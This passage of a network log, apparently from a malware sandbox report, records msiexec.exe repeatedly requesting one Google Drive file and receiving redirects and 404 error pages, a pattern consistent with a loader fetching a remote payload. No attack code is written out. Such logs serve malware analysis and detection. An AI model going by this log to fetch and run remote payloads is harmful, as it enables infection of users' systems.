2025-01-11 03:27:02 UTC	1652	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4f 57 69 53 72 62 31 33 64 48 2d 76 6e 44 38 48 75 74 49 5a 38 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="OWiSrb13dH-vnD8HutIZ8A">*{margin:0;padding:0}html,code{font:15px/22px arial

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.11	49982	142.250.184.238	443	7536	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 03:27:03 UTC	417	OUT	GET /uc?export=download&id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: drive.google.com Cache-Control: no-cache Cookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
2025-01-11 03:27:03 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Sat, 11 Jan 2025 03:27:03 GMT Location: https://drive.usercontent.google.com/download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download Strict-Transport-Security: max-age=31536000 Content-Security-Policy: script-src 'nonce-FWU0NZGBokI1x_ZZ_ZC9DA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Cross-Origin-Opener-Policy: same-origin Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.11	49983	142.250.185.161	443	7536	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 03:27:04 UTC	459	OUT	GET /download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
2025-01-11 03:27:04 UTC	1844	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFIdbgSSlXKP8L-8uIF3KR10TwURCJYTf2ZHs-yXQ1Y6X0TGqiFPcMD5Zg1AautT6eWBMfTS Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Sat, 11 Jan 2025 03:27:04 GMT Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-PATuXIzGV7I8EryN1XbpKw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Cross-Origin-Opener-Policy: same-origin Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Length: 1652 Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2025-01-11 03:27:04 UTC	1652	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4c 78 6f 4e 56 52 54 59 4f 72 71 66 59 35 74 42 62 6e 68 67 45 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="LxoNVRTYOrqfY5tBbnhgEA">*{margin:0;padding:0}html,code{font:15px/22px arial

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.11	49984	142.250.184.238	443	7536	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 03:27:05 UTC	417	OUT	GET /uc?export=download&id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: drive.google.com Cache-Control: no-cache Cookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
2025-01-11 03:27:05 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Sat, 11 Jan 2025 03:27:05 GMT Location: https://drive.usercontent.google.com/download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download Strict-Transport-Security: max-age=31536000 Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Cross-Origin-Opener-Policy: same-origin Content-Security-Policy: script-src 'nonce-Jz3Ridc61Pkb6ur1BuyWbA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.11	49985	142.250.185.161	443	7536	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 03:27:06 UTC	459	OUT	GET /download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
2025-01-11 03:27:06 UTC	1844	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFIdbgS_7we_Jgz9SeK2_mqLiIIIfmf2FNi-7YaDwpEywJm3MjTx1fsQx0Gyo7vK5vraXFiZ Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Sat, 11 Jan 2025 03:27:06 GMT Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-MOuZkqASuH69hcgn4wPVag' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Cross-Origin-Opener-Policy: same-origin Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Length: 1652 Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2025-01-11 03:27:06 UTC	1652	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 68 54 46 79 36 56 66 64 42 75 57 70 45 66 48 4d 4a 63 65 62 30 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="hTFy6VfdBuWpEfHMJceb0w">*{margin:0;padding:0}html,code{font:15px/22px arial

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.11	49986	142.250.184.238	443	7536	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 03:27:07 UTC	417	OUT	GET /uc?export=download&id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: drive.google.com Cache-Control: no-cache Cookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
2025-01-11 03:27:08 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Sat, 11 Jan 2025 03:27:08 GMT Location: https://drive.usercontent.google.com/download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download Strict-Transport-Security: max-age=31536000 Cross-Origin-Opener-Policy: same-origin Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Security-Policy: script-src 'nonce-px9zaahxD4tRJNWUcwtEnw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.11	49987	142.250.185.161	443	7536	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 03:27:08 UTC	459	OUT	GET /download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
2025-01-11 03:27:09 UTC	1851	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFIdbgQejWijWPmdtqOOVevx0VQqlRNRrLb48Tbrt1BoftBF-dXawOk8aphvyqEjBbtSrzffb37go3c Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Sat, 11 Jan 2025 03:27:09 GMT Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-1RuAlN_AFEj93_ri0aLb0Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Cross-Origin-Opener-Policy: same-origin Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Length: 1652 Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2025-01-11 03:27:09 UTC	1652	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 48 4b 36 35 4b 75 37 2d 73 78 74 6d 55 74 76 58 67 69 6a 35 63 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="HK65Ku7-sxtmUtvXgij5cw">*{margin:0;padding:0}html,code{font:15px/22px arial

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.11	49988	142.250.184.238	443	7536	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 03:27:10 UTC	417	OUT	GET /uc?export=download&id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: drive.google.com Cache-Control: no-cache Cookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
2025-01-11 03:27:10 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Sat, 11 Jan 2025 03:27:10 GMT Location: https://drive.usercontent.google.com/download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download Strict-Transport-Security: max-age=31536000 Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-2K6Sa4QFUI9GEgJ2qfg8Dw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Cross-Origin-Opener-Policy: same-origin Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.11	49989	142.250.185.161	443	7536	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 03:27:11 UTC	459	OUT	GET /download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
2025-01-11 03:27:11 UTC	1851	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFIdbgQ-7sPfPJgZ8UglhXntAPa-4FEl7_qqnxhXP4nJWpIA8ZXhg22qloNRWoLXZoGBVGu5nJKN8iQ Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Sat, 11 Jan 2025 03:27:11 GMT Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-txyYCFHWlemBgCO_s4WLRA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Cross-Origin-Opener-Policy: same-origin Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Length: 1652 Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
